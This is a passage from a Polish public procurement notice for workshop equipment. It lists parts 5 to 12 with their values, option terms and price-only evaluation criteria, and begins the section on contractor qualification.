Cena oferty suma wartości zamówienia podstawowego oraz opcjonalnego <br/>(C) = najkorzystniejsza oferta / badana oferta x 100 %<br/>9.	Za najkorzystniejszą ofertę zamawiający uzna ofertę, która uzyska największą liczbę punktów obliczoną jako suma punktów przyznanych w poszczególnych kryteriach.<br/>a.	Wynik końcowy (W) = C</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 5: Dostawa drobnego wyposażenia i urządzeń warsztatowych </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 9947,96 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43800000-1 - Urządzenia warsztatowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji.<br/>a.	Wykaz ilościowy i asortymentowy zamówienia opcjonalnego zawierają Formularze asortymentowo-cenowe - załączniki nr 3.1 – 3.12<br/>b.	Oferta Wykonawcy powinna przedstawiać cenę zamówienia z uwzględnieniem jego pełnego zakresu (tj. zamówienia podstawowego i opcjonalnego).<br/>c.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Zamawiający może z prawa opcji nie skorzystać lub skorzystać w części.<br/>d.	Nie skorzystanie przez zamawiającego z prawa opcji nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>e.	Zamówienie objęte prawem opcji wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia, że zamawiający zamierza z opcji skorzystać.<br/>f.	Zamawiający jest uprawniony do skorzystania z prawa opcji w ciągu 28 dni kalendarzowych od daty poinformowania przez Zamawiającego o wykorzystaniu zamówienia opcjonalnego, jednak nie później niż do 28 listopada 2025r. (w zależności od tego, który z wyżej wymienionych terminów upłynie wcześniej)<br/>g.	Dodatkowe informacje dotyczące prawa opcji zawarto w Projektowanych postanowieniach umowy - załącznik nr 1. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">8.	Zamawiający dokona oceny ofert, przyznając 1 pkt za każdy 1 % wagi poniższych kryteriów:<br/>a.	Cena oferty suma wartości zamówienia podstawowego oraz opcjonalnego <br/>(C) = najkorzystniejsza oferta / badana oferta x 100 %<br/>9.	Za najkorzystniejszą ofertę zamawiający uzna ofertę, która uzyska największą liczbę punktów obliczoną jako suma punktów przyznanych w poszczególnych kryteriach.<br/>a.	Wynik końcowy (W) = C</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 6: Dostawa drobnego wyposażenia i urządzeń warsztatowych </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 93542,52 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43800000-1 - Urządzenia warsztatowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji.<br/>a.	Wykaz ilościowy i asortymentowy zamówienia opcjonalnego zawierają Formularze asortymentowo-cenowe - załączniki nr 3.1 – 3.12<br/>b.	Oferta Wykonawcy powinna przedstawiać cenę zamówienia z uwzględnieniem jego pełnego zakresu (tj. zamówienia podstawowego i opcjonalnego).<br/>c.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Zamawiający może z prawa opcji nie skorzystać lub skorzystać w części.<br/>d.	Nie skorzystanie przez zamawiającego z prawa opcji nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>e.	Zamówienie objęte prawem opcji wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia, że zamawiający zamierza z opcji skorzystać.<br/>f.	Zamawiający jest uprawniony do skorzystania z prawa opcji w ciągu 28 dni kalendarzowych od daty poinformowania przez Zamawiającego o wykorzystaniu zamówienia opcjonalnego, jednak nie później niż do 28 listopada 2025r. (w zależności od tego, który z wyżej wymienionych terminów upłynie wcześniej)<br/>g.	Dodatkowe informacje dotyczące prawa opcji zawarto w Projektowanych postanowieniach umowy - załącznik nr 1. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">8.	Zamawiający dokona oceny ofert, przyznając 1 pkt za każdy 1 % wagi poniższych kryteriów:<br/>a.	Cena oferty suma wartości zamówienia podstawowego oraz opcjonalnego <br/>(C) = najkorzystniejsza oferta / badana oferta x 100 %<br/>9.	Za najkorzystniejszą ofertę zamawiający uzna ofertę, która uzyska największą liczbę punktów obliczoną jako suma punktów przyznanych w poszczególnych kryteriach.<br/>a.	Wynik końcowy (W) = C</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 7: Dostawa drobnego wyposażenia i urządzeń warsztatowych </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 36706,36 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43800000-1 - Urządzenia warsztatowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji.<br/>a.	Wykaz ilościowy i asortymentowy zamówienia opcjonalnego zawierają Formularze asortymentowo-cenowe - załączniki nr 3.1 – 3.12<br/>b.	Oferta Wykonawcy powinna przedstawiać cenę zamówienia z uwzględnieniem jego pełnego zakresu (tj. zamówienia podstawowego i opcjonalnego).<br/>c.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Zamawiający może z prawa opcji nie skorzystać lub skorzystać w części.<br/>d.	Nie skorzystanie przez zamawiającego z prawa opcji nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>e.	Zamówienie objęte prawem opcji wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia, że zamawiający zamierza z opcji skorzystać.<br/>f.	Zamawiający jest uprawniony do skorzystania z prawa opcji w ciągu 28 dni kalendarzowych od daty poinformowania przez Zamawiającego o wykorzystaniu zamówienia opcjonalnego, jednak nie później niż do 28 listopada 2025r. (w zależności od tego, który z wyżej wymienionych terminów upłynie wcześniej)<br/>g.	Dodatkowe informacje dotyczące prawa opcji zawarto w Projektowanych postanowieniach umowy - załącznik nr 1. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">8.	Zamawiający dokona oceny ofert, przyznając 1 pkt za każdy 1 % wagi poniższych kryteriów:<br/>a.	Cena oferty suma wartości zamówienia podstawowego oraz opcjonalnego <br/>(C) = najkorzystniejsza oferta / badana oferta x 100 %<br/>9.	Za najkorzystniejszą ofertę zamawiający uzna ofertę, która uzyska największą liczbę punktów obliczoną jako suma punktów przyznanych w poszczególnych kryteriach.<br/>a.	Wynik końcowy (W) = C</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 8: Dostawa drobnego wyposażenia i urządzeń warsztatowych </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 7996,62 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43800000-1 - Urządzenia warsztatowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji.<br/>a.	Wykaz ilościowy i asortymentowy zamówienia opcjonalnego zawierają Formularze asortymentowo-cenowe - załączniki nr 3.1 – 3.12<br/>b.	Oferta Wykonawcy powinna przedstawiać cenę zamówienia z uwzględnieniem jego pełnego zakresu (tj. zamówienia podstawowego i opcjonalnego).<br/>c.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Zamawiający może z prawa opcji nie skorzystać lub skorzystać w części.<br/>d.	Nie skorzystanie przez zamawiającego z prawa opcji nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>e.	Zamówienie objęte prawem opcji wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia, że zamawiający zamierza z opcji skorzystać.<br/>f.	Zamawiający jest uprawniony do skorzystania z prawa opcji w ciągu 28 dni kalendarzowych od daty poinformowania przez Zamawiającego o wykorzystaniu zamówienia opcjonalnego, jednak nie później niż do 28 listopada 2025r. (w zależności od tego, który z wyżej wymienionych terminów upłynie wcześniej)<br/>g.	Dodatkowe informacje dotyczące prawa opcji zawarto w Projektowanych postanowieniach umowy - załącznik nr 1. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">8.	Zamawiający dokona oceny ofert, przyznając 1 pkt za każdy 1 % wagi poniższych kryteriów:<br/>a.	Cena oferty suma wartości zamówienia podstawowego oraz opcjonalnego <br/>(C) = najkorzystniejsza oferta / badana oferta x 100 %<br/>9.	Za najkorzystniejszą ofertę zamawiający uzna ofertę, która uzyska największą liczbę punktów obliczoną jako suma punktów przyznanych w poszczególnych kryteriach.<br/>a.	Wynik końcowy (W) = C</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 9: Dostawa drobnego wyposażenia i urządzeń warsztatowych </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 32963,72 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43800000-1 - Urządzenia warsztatowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji.<br/>a.	Wykaz ilościowy i asortymentowy zamówienia opcjonalnego zawierają Formularze asortymentowo-cenowe - załączniki nr 3.1 – 3.12<br/>b.	Oferta Wykonawcy powinna przedstawiać cenę zamówienia z uwzględnieniem jego pełnego zakresu (tj. zamówienia podstawowego i opcjonalnego).<br/>c.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Zamawiający może z prawa opcji nie skorzystać lub skorzystać w części.<br/>d.	Nie skorzystanie przez zamawiającego z prawa opcji nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>e.	Zamówienie objęte prawem opcji wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia, że zamawiający zamierza z opcji skorzystać.<br/>f.	Zamawiający jest uprawniony do skorzystania z prawa opcji w ciągu 28 dni kalendarzowych od daty poinformowania przez Zamawiającego o wykorzystaniu zamówienia opcjonalnego, jednak nie później niż do 28 listopada 2025r. (w zależności od tego, który z wyżej wymienionych terminów upłynie wcześniej)<br/>g.	Dodatkowe informacje dotyczące prawa opcji zawarto w Projektowanych postanowieniach umowy - załącznik nr 1. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">8.	Zamawiający dokona oceny ofert, przyznając 1 pkt za każdy 1 % wagi poniższych kryteriów:<br/>a.	Cena oferty suma wartości zamówienia podstawowego oraz opcjonalnego <br/>(C) = najkorzystniejsza oferta / badana oferta x 100 %<br/>9.	Za najkorzystniejszą ofertę zamawiający uzna ofertę, która uzyska największą liczbę punktów obliczoną jako suma punktów przyznanych w poszczególnych kryteriach.<br/>a.	Wynik końcowy (W) = C</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 10</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 10: Dostawa drobnego wyposażenia i urządzeń warsztatowych </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 41196,36 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43800000-1 - Urządzenia warsztatowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji.<br/>a.	Wykaz ilościowy i asortymentowy zamówienia opcjonalnego zawierają Formularze asortymentowo-cenowe - załączniki nr 3.1 – 3.12<br/>b.	Oferta Wykonawcy powinna przedstawiać cenę zamówienia z uwzględnieniem jego pełnego zakresu (tj. zamówienia podstawowego i opcjonalnego).<br/>c.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Zamawiający może z prawa opcji nie skorzystać lub skorzystać w części.<br/>d.	Nie skorzystanie przez zamawiającego z prawa opcji nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>e.	Zamówienie objęte prawem opcji wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia, że zamawiający zamierza z opcji skorzystać.<br/>f.	Zamawiający jest uprawniony do skorzystania z prawa opcji w ciągu 28 dni kalendarzowych od daty poinformowania przez Zamawiającego o wykorzystaniu zamówienia opcjonalnego, jednak nie później niż do 28 listopada 2025r. (w zależności od tego, który z wyżej wymienionych terminów upłynie wcześniej)<br/>g.	Dodatkowe informacje dotyczące prawa opcji zawarto w Projektowanych postanowieniach umowy - załącznik nr 1. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">8.	Zamawiający dokona oceny ofert, przyznając 1 pkt za każdy 1 % wagi poniższych kryteriów:<br/>a.	Cena oferty suma wartości zamówienia podstawowego oraz opcjonalnego <br/>(C) = najkorzystniejsza oferta / badana oferta x 100 %<br/>9.	Za najkorzystniejszą ofertę zamawiający uzna ofertę, która uzyska największą liczbę punktów obliczoną jako suma punktów przyznanych w poszczególnych kryteriach.<br/>a.	Wynik końcowy (W) = C</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 11</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 11: Dostawa drobnego wyposażenia i urządzeń warsztatowych </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 29511,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43800000-1 - Urządzenia warsztatowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji.<br/>a.	Wykaz ilościowy i asortymentowy zamówienia opcjonalnego zawierają Formularze asortymentowo-cenowe - załączniki nr 3.1 – 3.12<br/>b.	Oferta Wykonawcy powinna przedstawiać cenę zamówienia z uwzględnieniem jego pełnego zakresu (tj. zamówienia podstawowego i opcjonalnego).<br/>c.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Zamawiający może z prawa opcji nie skorzystać lub skorzystać w części.<br/>d.	Nie skorzystanie przez zamawiającego z prawa opcji nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>e.	Zamówienie objęte prawem opcji wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia, że zamawiający zamierza z opcji skorzystać.<br/>f.	Zamawiający jest uprawniony do skorzystania z prawa opcji w ciągu 28 dni kalendarzowych od daty poinformowania przez Zamawiającego o wykorzystaniu zamówienia opcjonalnego, jednak nie później niż do 28 listopada 2025r. (w zależności od tego, który z wyżej wymienionych terminów upłynie wcześniej)<br/>g.	Dodatkowe informacje dotyczące prawa opcji zawarto w Projektowanych postanowieniach umowy - załącznik nr 1. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">8.	Zamawiający dokona oceny ofert, przyznając 1 pkt za każdy 1 % wagi poniższych kryteriów:<br/>a.	Cena oferty suma wartości zamówienia podstawowego oraz opcjonalnego <br/>(C) = najkorzystniejsza oferta / badana oferta x 100 %<br/>9.	Za najkorzystniejszą ofertę zamawiający uzna ofertę, która uzyska największą liczbę punktów obliczoną jako suma punktów przyznanych w poszczególnych kryteriach.<br/>a.	Wynik końcowy (W) = C</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 12</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 12: Dostawa drobnego wyposażenia i urządzeń warsztatowych </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 4552,88 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43800000-1 - Urządzenia warsztatowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji.<br/>a.	Wykaz ilościowy i asortymentowy zamówienia opcjonalnego zawierają Formularze asortymentowo-cenowe - załączniki nr 3.1 – 3.12<br/>b.	Oferta Wykonawcy powinna przedstawiać cenę zamówienia z uwzględnieniem jego pełnego zakresu (tj. zamówienia podstawowego i opcjonalnego).<br/>c.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Zamawiający może z prawa opcji nie skorzystać lub skorzystać w części.<br/>d.	Nie skorzystanie przez zamawiającego z prawa opcji nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>e.	Zamówienie objęte prawem opcji wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia, że zamawiający zamierza z opcji skorzystać.<br/>f.	Zamawiający jest uprawniony do skorzystania z prawa opcji w ciągu 28 dni kalendarzowych od daty poinformowania przez Zamawiającego o wykorzystaniu zamówienia opcjonalnego, jednak nie później niż do 28 listopada 2025r. (w zależności od tego, który z wyżej wymienionych terminów upłynie wcześniej)<br/>g.	Dodatkowe informacje dotyczące prawa opcji zawarto w Projektowanych postanowieniach umowy - załącznik nr 1. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">8.	Zamawiający dokona oceny ofert, przyznając 1 pkt za każdy 1 % wagi poniższych kryteriów:<br/>a.	Cena oferty suma wartości zamówienia podstawowego oraz opcjonalnego <br/>(C) = najkorzystniejsza oferta / badana oferta x 100 %<br/>9.	Za najkorzystniejszą ofertę zamawiający uzna ofertę, która uzyska największą liczbę punktów obliczoną jako suma punktów przyznanych w poszczególnych kryteriach.<br/>a.	Wynik końcowy (W) = C</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o braku podstaw wykluczenia:<br/>	oświadczenie - załącznik nr 4, składa wykonawca lub wykonawca planujący realizację zamówienia z udziałem podwykonawców (podwykonawcy nie składają oświadczenia);<br/>	oświadczenie - załącznik nr 5, składa odrębnie każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>	oświadczenie - załącznik nr 6, składa każdy podmiot udostępniający zasoby.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowe środki 